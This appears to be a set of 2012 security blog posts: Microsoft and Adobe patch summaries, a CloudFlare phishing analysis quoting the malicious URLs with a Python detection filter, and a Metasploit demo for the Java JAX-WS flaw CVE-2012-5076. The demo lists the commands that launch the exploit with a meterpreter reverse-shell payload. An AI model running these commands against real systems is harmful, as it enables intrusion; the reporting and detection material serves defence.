Microsoft November 2012 Patch Tuesday Review

Microsoft released, on 13 November 2012, as part of its November Patch Tuesday, two updated security advisories and six security bulletins. Of the six security bulletins, four have a Critical security rating.

Microsoft Security Advisory 2269637

MSA-2269637, released during August 2010, has been updated. The security advisory concerns “Insecure Library Loading”, and the update adds a reference to MS12-074 “Vulnerabilities in .NET Framework Could Allow Remote Code Execution”.

Microsoft Security Advisory 2749655

MSA-2749655, released during October 2012, has been updated. The security advisory concerns “Compatibility Issues Affecting Signed Microsoft Binaries”, and the update modifies the references to the KBs of the “Microsoft Office 2003 Service Pack 3” updates.

MS12-071 – Cumulative Security Update for Internet Explorer

MS12-071 security update, classified as Critical, allowing remote code execution, is the fix for three privately reported vulnerabilities. CVE-2012-1538 has a 9.3 CVSS base score and was discovered and privately reported by Jose A. Vazquez of spa-s3c.blogspot.com, working with VeriSign iDefense Labs. CVE-2012-1539 has a 10.0 CVSS base score and was discovered and privately reported by Jose A. Vazquez of spa-s3c.blogspot.com, working with VeriSign iDefense Labs. CVE-2012-4775 has a 9.3 CVSS base score and was discovered and privately reported by Cheng-da Tsai (Orange), Sung-ting Tsai, and Ming-chieh Pan (Nanika) of Trend Micro.

Affected software is:

  • Internet Explorer 9

MS12-072 – Vulnerabilities in Windows Shell Could Allow Remote Code Execution

MS12-072 security update, classified as Critical, allowing remote code execution, is fixing two privately reported vulnerabilities. CVE-2012-1527 has a 9.3 CVSS base score and was discovered and privately reported by Tal Zeltzer, working with VeriSign iDefense Labs. CVE-2012-1528 has a 9.3 CVSS base score and was discovered and privately reported by Tal Zeltzer, working with VeriSign iDefense Labs.

Affected software:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for 64-bit Systems
  • Windows Server 2012

MS12-074 – Vulnerabilities in .NET Framework Could Allow Remote Code Execution

MS12-074 security update, classified as Critical, allowing remote code execution, is fixing five privately reported vulnerabilities. CVE-2012-1895 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-1896 has a 5.0 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-2519 has a 7.9 CVSS base score and was discovered and privately reported. CVE-2012-4776 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security. CVE-2012-4777 has a 9.3 CVSS base score and was discovered and privately reported by James Forshaw of Context Information Security.

Affected software:

  • Microsoft .NET Framework 1.1 Service Pack 1
  • Microsoft .NET Framework 1.0 Service Pack 3
  • Microsoft .NET Framework 2.0 Service Pack 2
  • Microsoft .NET Framework 1.1
  • Microsoft .NET Framework 3.5
  • Microsoft .NET Framework 3.5.1
  • Microsoft .NET Framework 4
  • Microsoft .NET Framework 4.5

MS12-075 – Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution

MS12-075 security update, classified as Important, allowing remote code execution, is fixing three privately reported vulnerabilities. CVE-2012-2530 has a 7.2 CVSS base score and was discovered and privately reported. CVE-2012-2553 has a 7.2 CVSS base score and was discovered and privately reported by Matthew Jurczyk of Google Inc. CVE-2012-2897 has a 10.0 CVSS base score and was discovered and privately reported by Eetu Luodemaa and Joni Vähämäki of Documill, working with the Chromium Security Rewards Program.

Affected software:

  • Windows XP Service Pack 3
  • Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for 64-bit Systems
  • Windows Server 2012

MS12-076 – Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution

MS12-076 security update, classified as Important, allowing remote code execution, is fixing four privately reported vulnerabilities. CVE-2012-1885 has a 9.3 CVSS base score and was discovered and privately reported by Sean Larsson, working with the iDefense VCP. CVE-2012-1886 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with the iDefense VCP. CVE-2012-1887 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with the iDefense VCP. CVE-2012-2543 has a 9.3 CVSS base score and was discovered and privately reported by an anonymous researcher, working with HP TippingPoint’s Zero Day Initiative.

Affected software:

  • Microsoft Office 2003 Service Pack 3
  • Microsoft Office 2007 Service Pack 2
  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 1 (32-bit editions)
  • Microsoft Office 2010 Service Pack 1 (64-bit editions)
  • Microsoft Office 2008 for Mac
  • Microsoft Office for Mac 2011
  • Microsoft Excel Viewer
  • Microsoft Office Compatibility Pack Service Pack 2
  • Microsoft Office Compatibility Pack Service Pack 3

MS12-073 – Vulnerability in Kerberos Could Allow Denial of Service

MS12-073 security update, classified as Moderate, allowing information disclosure, is fixing two vulnerabilities. CVE-2012-2531 has a 2.1 CVSS base score and was discovered and privately reported by Justin Royce of ProDX. CVE-2012-2532 has a 5.0 CVSS base score and was discovered and publicly reported.

Affected software:

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

CloudFlare Phishing Email Campaign “Confirmation data changes”

Today, I received at one of my email addresses a CloudFlare phishing email, “CLOUDFLARE.COM. domain.com: Confirmation data changes”.

As you can see in the above screenshot, the phishing email claims that your CloudFlare account has exceeded the available load limit and that the account will be blocked if you don’t adapt the rate plan of the account.

The malicious link “https://cloudflare.com/login/?user=9647dec8-7e4c-40d6-bf15-43e3bd9233d3” was redirecting to “http://cloudflare.com.login.9437dec8-7e4c-40d6-bf15-43e3bd9226d3.alert-cloudflare.com.swteh.ru/login.php?domain=zataz.com” hosted on 77.222.41.100 (Russian SpaceWeb.ru Hosting Provider – AS44112).

I found another malicious link, on a Russian forum:

“http://cloudflare.com.login.1647dec1-1e4c-50d6-bf15-43e4bd9133d9.alert-cloudflare.com.swteh.ru/login.php?domain=xxxxx.com” located on the same server.

In the email headers we can see that the phishing email was sent by “grafias.lunarpages.com”, hosted on 216.97.235.15 in the US.

CloudFlare users alerted the CloudFlare team through a post in the support forum, and an alert was then raised to all CloudFlare customers.
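
As an added example (not part of the original post and not CloudFlare's code), the Python sketch below shows how a mail filter could flag this lure: it compares the host a link displays with the host it really leads to, and looks for a protected brand used as leading sub-domain labels or embedded in a label of someone else's domain. The function names, the BRAND_DOMAINS list and the two-label registrable-domain shortcut are assumptions; the two URLs are the ones quoted above.

```python
from urllib.parse import urlsplit

# Assumption: the brands this filter protects; extend for your own environment.
BRAND_DOMAINS = ("cloudflare.com",)

def host_of(url):
    """Lower-cased hostname of a URL, or '' when the string is not a URL."""
    return (urlsplit(url.strip()).hostname or "").lower().rstrip(".")

def registrable(host):
    """Naive registrable domain: the last two labels.
    Assumption: adequate for .com/.ru; use a Public Suffix List in production."""
    return ".".join(host.split(".")[-2:])

def check_link(shown_text, target_url):
    """Compare what the reader sees with where the link really leads."""
    findings = []
    target = host_of(target_url)
    owner = registrable(target)
    shown = host_of(shown_text)
    # 1. The visible text is a URL whose domain differs from the real target.
    if shown and registrable(shown) != owner:
        findings.append(f"display-mismatch:{registrable(shown)}->{owner}")
    labels = target.split(".")
    for brand in BRAND_DOMAINS:
        if owner == brand:
            continue  # genuinely hosted under the brand's own domain
        want = brand.split(".")
        # 2. Brand appears as whole labels to the left of another domain.
        if any(labels[i:i + len(want)] == want
               for i in range(len(labels) - len(want))):
            findings.append(f"brand-as-subdomain:{brand}@{owner}")
        # 3. Brand name embedded inside a label, e.g. "alert-cloudflare".
        if any(want[0] in lab and lab != want[0] for lab in labels):
            findings.append(f"brand-in-label:{want[0]}@{owner}")
    return findings

# Both URLs are the ones quoted in the post above.
SHOWN = "https://cloudflare.com/login/?user=9647dec8-7e4c-40d6-bf15-43e3bd9233d3"
TARGET = ("http://cloudflare.com.login.9437dec8-7e4c-40d6-bf15-43e3bd9226d3"
          ".alert-cloudflare.com.swteh.ru/login.php?domain=zataz.com")

if __name__ == "__main__":
    for finding in check_link(SHOWN, TARGET):
        print(finding)
```

All three rules fire on the link from this campaign, while a link whose text and target both sit under cloudflare.com produces no finding.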

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

Timeline :

Vulnerability patched by Oracle in the October 2012 CPU
Vulnerability discovered exploited in the wild by @kafeine on 2012-11-09
Metasploit PoC provided by juan vazquez on 2012-11-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”

Affected version(s) :

Java 1.7.0_07-b10 and earlier

Tested on Windows XP Pro SP3 with :

Java 1.7.0_07-b10

Description :

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_jaxws
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

APSB12-24 – Adobe November 2012 Patch Tuesday Review

Adobe released, on 6 November 2012, as part of its November Patch Tuesday, one security bulletin dealing with 7 vulnerabilities. This security bulletin has a Critical severity rating. All of these vulnerabilities have a CVSS base score of 10.0.

APSB12-24 – Security updates available for Adobe Flash Player

APSB12-24 concerns:

  • Adobe Flash Player 11.4.402.287 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.243 and earlier versions for Linux
  • Adobe Flash Player 11.2.202.238 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.20 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.19 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.4.0.2710 and earlier versions for Windows and Macintosh, SDK (includes AIR for iOS) and Android

CVE-2012-5274 (CVSS base score of 10.0), CVE-2012-5275 (CVSS base score of 10.0), CVE-2012-5276 (CVSS base score of 10.0), CVE-2012-5277 (CVSS base score of 10.0), CVE-2012-5279 (CVSS base score of 10.0), CVE-2012-5280 (CVSS base score of 10.0) have been discovered and reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team.

CVE-2012-5278 (CVSS base score of 10.0) has been discovered and reported by Eduardo Vela Nava of the Google Security Team.

I advise you to update your Adobe Flash Player as soon as possible.